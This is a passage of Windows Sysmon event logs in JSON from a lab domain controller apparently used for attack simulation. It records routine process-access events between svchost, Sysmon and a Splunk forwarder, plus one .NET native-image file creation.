{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7534,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.101\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.101","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7535,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.101\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.101","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7536,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.101\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.101","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7537,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.101\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.101","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7538,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.101\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.101","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7539,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.101\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.101","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7540,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.101\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.101","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7541,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.101\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-0010A59C0B00}\r\nTargetProcessId: 2920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.101","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-0010A59C0B00}","TargetProcessId":"2920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7542,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:44.179\r\nProcessGuid: {41C8662E-2258-5F25-0000-00101DCB0D00}\r\nProcessId: 4716\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\126c-0\\PresentationFramework.AeroLite.dll\r\nCreationUtcTime: 2020-08-01 08:05:44.179","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:44.179","ProcessGuid":"{41C8662E-2258-5F25-0000-00101DCB0D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\126c-0\\PresentationFramework.AeroLite.dll","CreationUtcTime":"2020-08-01 08:05:44.179","EventReceivedTime":"2020-08-01 